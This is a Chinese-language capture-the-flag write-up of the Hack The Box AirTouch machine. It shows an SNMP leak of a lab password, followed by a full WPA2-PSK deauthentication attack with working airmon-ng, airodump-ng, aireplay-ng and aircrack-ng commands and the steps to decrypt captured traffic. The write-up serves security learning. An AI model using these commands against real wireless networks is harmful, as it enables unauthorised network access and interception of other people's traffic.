WiFi Hack | DeAuthentication Attack

WiFi Hack | DeAuth Attack

免责声明:本次攻击为HTB下的虚拟场景,仅作为教学目的,请勿在未经允许的情况下实施此类攻击,违者后果自负;本次演示在虚拟环境中,无敏感信息,仅保留关键步骤及理论,其余部分做删减处理.

写在前面(正文请查看DeAuth)

这是一篇关于WIFI攻击的文章,起因是我在做Hackthebox的AirTouch机器过程中,学习到的一些WIFI攻击技术,我看社区内更多内容是偏Web,似乎还没有类似的分享,所以来分享一下我学到的WIFI攻击技术,也算是丰富一下社区内容的多样性。这次分享的是针对WPA2-PSK的DeAuthentication Attack, 不是很新的技术,江湖里的大佬太多了,各位大佬们轻喷:)

后续可能还会更新一篇针对高安全性的EAP-TLS认证的攻击,这也是企业级的WIFI、VPN认证协议,是一种基于证书的认证;以及Evil Twin这种针对WIFI的中间人攻击,这些都是在做AirTouch中学到的,因为我本身并不是专门研究WIFI攻击,相对而言我更了解的还是WEB和Windows域,所以可能说的不是非常清楚,师傅们多多包涵:)

WPA/WPA2-PSK

WPA2-PSK是个人用WIFI中非常常见的认证协议,相比于最早的WEP使用RC4加密算法和IV进行认证,WPA2-PSK已经使用了AES加密算法,相对而言安全性更高,如果你现在打开你的手机,查看你连接的WIFI,在安全性中很可能显示的是WPA/WPA2 PSK.

DeAuth

针对WPA-PSK,基本都是通过暴力破解密钥的方式进行攻击,如爆破pin码,PMKID等等,相对而言Deauthentication Attack会稍微复杂一些,这种攻击方式实际上是通过Dos+捕捉WPA握手流量+暴力破解,从而接管WIFI网络.

本次的攻击将演示,通过SNMP泄露,成功登录到主机,再通过Deauthentication攻击进入内部WIFI网络.

Step1: SNMP Leaking

snmpwalk -v2c -c public 10.129.25.155

iso.3.6.1.2.1.1.1.0 = STRING: "\"The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)\""
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (54112) 0:09:01.12
iso.3.6.1.2.1.1.4.0 = STRING: "admin@AirTouch.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "Consultant"
iso.3.6.1.2.1.1.6.0 = STRING: "\"Consultant pc\""

ssh consultant@10.129.25.155
RxBlZhLmOkacNWScmZ6D

Step2: Set up to Monitor mode

运行ip addr能看到靶机给了多个虚拟无线网卡,首先设置其中的一个为监控模式,一般情况下,WIFI网卡多为Manager模式,作为网络的参与者,会进行连接AP,获取IP,收发数据等,但无法监控其他WIFI信道.

airmon-ng start wlan0

此时wlan0被重命名为wlan0mon,并且已经设置为监听模式.

iw wlan0mon info

Interface wlan0mon
        ifindex 5
        wdev 0x4
        addr 02:00:00:00:00:00
        type monitor
        wiphy 0
        channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz
        txpower 20.00 dBm

Step3: List Network

通过airodump-ng列出所有监听到的WIFI,其中需要留意的是BSSID, ESSID以及CH,这些参数用来确定唯一的WIFI

airodump-ng wlan0mon

  • ESSID:WiFi的名称,用于方便人辨别WIFI
  • BSSID:AP的MAC地址
  • CH:当前WIFI所处的信道

Step4: capture specific network

设置仅抓取AirTouch-Internet的流量,输出到psk_handshake文件中,之后在开启一个新的ssh会话,执行aireplay.

airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 wlan0mon -w psk_handshake

Step5: Deauthenticate

在新的SSH会话中发送Deauthentication frames给AirTouch-Internet

aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon

Step6: Crack the key

在成功发送Deauth frames之后,通过Aircrack-ng破解key

aircrack-ng -w eaphammer/wordlists/rockyou.txt psk_handshake-01.cap

Step7: Import key

之后可以将key导入到wireshark中,这样可以查看明文的流量,或者使用wpa_passphrase生成配置文件,从而连接到无线网络中.

连接到AirTouch-Internet
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/config.conf
wpa_supplicant -i wlan1 -c /tmp/config.conf
# 设置通过DHCP自动获取IP
dhclient wlan1

此时能看到wlan1已经获得了IP.

root@AirTouch-Consultant:~# ip addr show wlan1
8: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.23/24 brd 192.168.3.255 scope global dynamic wlan1
       valid_lft 86384sec preferred_lft 86384sec
    inet6 fe80::ff:fe00:100/64 scope link 
       valid_lft forever preferred_lft forever
导入到wireshark

打开wireshark,选择左上角Edit->点击最下方的Preferences->Protocols->下拉选择到IEEE 802.11->Decryption Keys->Edit...,点击下方的+号,输入:

Key type: wpa-pwd
Key:challenge:AirTouch-Internet

此时在wireshark的Filter中输入HTTP,能看到已经解密的明文HTTP流量.

总结

需要用到的工具有:

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
iw

攻击流程:
首先设置一张网卡为监听模式->列出所有监听到的网络->指定要攻击的网络并抓取流量->发送Deauthentication frames->破解Key->导入key

TIP: 一般的网卡都不支持Monitor模式,WIFI攻击需要专用网卡.

写在最后

后续可能会更新一些windows域控以及Kerberos相关的内容,毕竟WIFI Hack不是我最熟悉的内容,如果各位师傅们有具体想看的内容或者有想交流的内容,请直接在评论中留言即可,感谢各位师傅:)

通过下方的链接注册HTB,一起薅羊毛:)

https://referral.hackthebox.com/mzG7dg8

My keybase:

d10n3

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。